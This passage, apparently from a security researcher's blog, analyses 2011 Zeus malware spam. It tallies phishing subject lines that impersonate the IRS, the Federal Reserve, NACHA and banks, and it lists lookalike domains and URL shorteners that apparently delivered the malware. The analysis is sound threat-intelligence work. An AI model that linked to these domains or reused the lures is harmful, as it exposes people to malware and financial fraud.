     8 | 2011-07-20 06:30:00 | Payment rejected
     6 | 2011-07-20 06:30:00 | Rejected transaction
    19 | 2011-07-20 06:15:00 | Canceled  payment
    13 | 2011-07-20 06:15:00 | Canceled transaction
    15 | 2011-07-20 06:15:00 | Canceled transfer
    16 | 2011-07-20 06:15:00 | Payment canceled
    17 | 2011-07-20 06:15:00 | Payment rejected
    24 | 2011-07-20 06:15:00 | Rejected transaction
     2 | 2011-07-20 05:00:00 | Wire transfer # 3240569823405844930
     4 | 2011-07-20 05:00:00 | Wire transfer # 3463453123432454667
     1 | 2011-07-20 05:00:00 | Wire transfer # 3858994783568734677
     1 | 2011-07-20 05:00:00 | Wire transfer # 4577867895676542367
     2 | 2011-07-20 05:00:00 | Wire transfer # 5645746324515345353
     2 | 2011-07-20 05:00:00 | Wire transfer # 6754846773457536756
     2 | 2011-07-20 05:00:00 | Wire transfer # 6785675623451222333
     1 | 2011-07-20 05:00:00 | Wire transfer # 8565696735865742365
     2 | 2011-07-20 05:00:00 | Wire transfer ID 2345578568567567544
     1 | 2011-07-20 05:00:00 | Wire transfer ID 3265474356547356756
     1 | 2011-07-20 05:00:00 | Wire transfer ID 3425215345565475468
     1 | 2011-07-20 05:00:00 | Wire transfer id 3425233214234534634
     5 | 2011-07-20 05:00:00 | Wire transfer ID 3425233214234534634
     1 | 2011-07-20 05:00:00 | Wire transfer id 3452364365475463425
     1 | 2011-07-20 05:00:00 | Wire transfer ID 4135146854351231151
     1 | 2011-07-20 05:00:00 | Wire transfer ID 4353267658545629087
     3 | 2011-07-20 05:00:00 | Wire transfer ID 5468513264769656536
     1 | 2011-07-20 05:00:00 | Wire transfer id 5473785489567245623
     1 | 2011-07-20 05:00:00 | Wire transfer ID 5687895416264572398
     1 | 2011-07-20 05:00:00 | Wire transfer ID 5876978567345176586
     1 | 2011-07-20 05:00:00 | Wire transfer ID 6768576565423453415
     1 | 2011-07-20 05:00:00 | Wire transfer id 6857234568657433677
     3 | 2011-07-20 05:00:00 | Wire transfer id 8479764976835672345
     1 | 2011-07-20 05:00:00 | Wire transfer id 8658375686537546544
    41 | 2011-07-20 05:00:00 | Your Wire fund transfer
     1 | 2011-07-20 04:30:00 | Wire transfer ID 6431531354846843122
     1 | 2011-07-19 04:45:00 | Change Confirmation
     1 | 2011-07-19 04:45:00 | Does your company is registered outstanding tax debts
     2 | 2011-07-19 04:45:00 | U.S. Department of the Treasury
     1 | 2011-07-19 04:45:00 | Your IRS payment rejected
     1 | 2011-07-19 04:30:00 | Change Confirmation
     1 | 2011-07-19 04:30:00 | Does your company including  tax debts
     1 | 2011-07-19 04:30:00 | Does your enterprise listed unpaid tax debts
     2 | 2011-07-19 04:30:00 | Federal Tax payment rejected
     1 | 2011-07-19 04:30:00 | For your company including unpaid tax debt
     1 | 2011-07-19 04:30:00 | For your enterprise including  tax debt
    13 | 2011-07-19 04:30:00 | Internal Revenue Service
     4 | 2011-07-19 04:30:00 | Internal Revenue Service (IRS)
     2 | 2011-07-19 04:30:00 | Internal Revenue Service United States Department of the Treasury
     4 | 2011-07-19 04:30:00 | IRC.gov
     5 | 2011-07-19 04:30:00 | IRS.gov US
     8 | 2011-07-19 04:30:00 | Notice of Underreported Income
     6 | 2011-07-19 04:30:00 | Payment IRS.gov
     4 | 2011-07-19 04:30:00 | Support IRS.gov
     5 | 2011-07-19 04:30:00 | Treasury Inspector General for Tax Administration
     1 | 2011-07-19 04:30:00 | U.S. Department of the Treasury
     2 | 2011-07-19 04:30:00 | Your enterprise has remained outstanding tax debts
     3 | 2011-07-19 04:30:00 | Your IRS payment rejected
     1 | 2011-07-19 04:15:00 | Internal Revenue Service
     1 | 2011-07-18 10:30:00 | Love BlackJack? Check out the games at Winner Palace
     1 | 2011-07-16 02:00:00 | Out of Office AutoReply: Please Review
     1 | 2011-07-15 09:00:00 | For your company is registered unpaid tax debt
     1 | 2011-07-15 09:00:00 | Internal Revenue Service
     2 | 2011-07-15 08:45:00 | Change Confirmation
     2 | 2011-07-15 08:45:00 | Federal Tax payment rejected
     2 | 2011-07-15 08:45:00 | Internal Revenue Service
     2 | 2011-07-15 08:45:00 | Internal Revenue Service (IRS)
     4 | 2011-07-15 08:45:00 | Internal Revenue Service United States Department of the Treasury
     3 | 2011-07-15 08:45:00 | IRC.gov
     1 | 2011-07-15 08:45:00 | IRS.gov US
     3 | 2011-07-15 08:45:00 | Payment IRS.gov
     2 | 2011-07-15 08:45:00 | Support IRS.gov
     1 | 2011-07-15 08:45:00 | Treasury Inspector General for Tax Administration
     1 | 2011-07-15 08:45:00 | U.S. Department of the Treasury
     2 | 2011-07-15 08:45:00 | Your IRS payment rejected
     1 | 2011-07-15 07:30:00 | TV murder appeal prompts 40 calls
     1 | 2011-07-14 21:30:00 | US senator requests hacking probe
     1 | 2011-07-14 20:15:00 | Parties unite over BSkyB bid call
     1 | 2011-07-14 19:45:00 | PM Kan urges 'nuclear-free Japan'
     1 | 2011-07-14 18:00:00 | Man tells jury 'I killed Lynette'
     1 | 2011-07-14 15:15:00 | VIDEO: Live: Debate on youth unemployment
     1 | 2011-07-14 07:15:00 | Security update for banking accounts.
    10 | 2011-07-14 07:00:00 | ACH and Wire transfers disabled.
     5 | 2011-07-14 07:00:00 | Banking security update.
     7 | 2011-07-14 07:00:00 | Security update for banking accounts.
     5 | 2011-07-14 07:00:00 | Update for your banking account.
     1 | 2011-07-13 11:30:00 | Hospitals warned over clot deaths
     1 | 2011-07-13 07:45:00 | Does your enterprise listed unpaid tax debt
     3 | 2011-07-13 07:45:00 | Federal Tax payment rejected
     5 | 2011-07-13 07:45:00 | Internal Revenue Service United States Department of the Treasury
     2 | 2011-07-13 07:45:00 | IRC.gov
     7 | 2011-07-13 07:45:00 | Notice of Underreported Income
     1 | 2011-07-13 07:45:00 | Treasury Inspector General for Tax Administration
     2 | 2011-07-13 07:45:00 | U.S. Department of the Treasury
     1 | 2011-07-13 07:45:00 | Your company listed outstanding tax debt
     1 | 2011-07-13 07:45:00 | Your enterprise listed unpaid tax debt
     1 | 2011-07-13 07:30:00 | Internal Revenue Service
     2 | 2011-07-13 07:30:00 | Internal Revenue Service (IRS)
     2 | 2011-07-13 07:30:00 | Internal Revenue Service United States Department of the Treasury
     1 | 2011-07-13 07:30:00 | Notice of Underreported Income
     3 | 2011-07-13 07:30:00 | Payment IRS.gov
     1 | 2011-07-13 07:30:00 | Support IRS.gov
     2 | 2011-07-13 07:30:00 | U.S. Department of the Treasury
     2 | 2011-07-13 07:30:00 | Your IRS payment rejected
     3 | 2011-07-13 05:45:00 | Business accounts updates
     1 | 2011-07-13 05:45:00 | Dear corporate clients
     1 | 2011-07-13 05:45:00 | New settings for wire transfers
     1 | 2011-07-13 05:30:00 | Business accounts updates
     5 | 2011-07-13 05:30:00 | Corporate banking security
     3 | 2011-07-13 05:30:00 | Dear corporate clients
    10 | 2011-07-13 05:30:00 | Federalreserve security update
     4 | 2011-07-13 05:30:00 | New security settings
     4 | 2011-07-13 05:30:00 | New security update
     5 | 2011-07-13 05:30:00 | New settings for wire transfers
     2 | 2011-07-13 05:30:00 | Wire transfers update



We can also ask it to tell us what spammed destinations were being described by those messages and learn that what we see is:

July 13th = usbanking-security.com
July 15th = federalsecusrity.com
July 19th = taxreport-irs.com
July 19th = irs-taxes-report.com
July 19th = irs-report-link.com
July 20th = www.federalreserve.gov
July 20th = reports-federalreserve.com
July 20th = nacha-alert.org
July 20th = nacha-alert.com
July 20th = alerts-federalresrve.com
July 21st = national-security-agency.com
July 21st = federal-secueity-government.com
July 22nd = irs-downloads.com
July 22nd = irs-files.com
July 26th = taxes-irs.net
July 27th = www.nacha-rejected.com
July 27th = taxes-refund.com
July 28th = fdic-updates.com

Again, the query run says "look at my spam history FOR THE IP ADDRESSES USED BY THE GOV-RELATED ZEUS DOMAIN THIS MORNING and see what else they've sent me previously."

I've temporarily included only those links that were DIRECTLY linking to an executable, but we also have all of the "domain-shortener" spam that was sent on July 13th pretending to be a LinkedIn message. In that case, the spam used 25 different shortener services, most of which seem to have been created specifically for that purpose:

1tja.com
4h.biz
4nu.net
coge.la
d3c.co
flyfrm.com
gli.im
gsfn.info
hi2.com
ion.so
ks.gs
lawurl.com
lllll.im
niy.me
nznet.info
sendtourl.com
shoor.tk
smlurl.info
sra.li
tiny.tw
vs0.net
widg.me
wurl.ca
yi.pe
zolp.net

And yes, we can also tie today's spamming botnet to all of those fake LinkedIn spam messages that distributed Zeus on July 13th.

{ Comments on this entry are closed }

← Previous Entries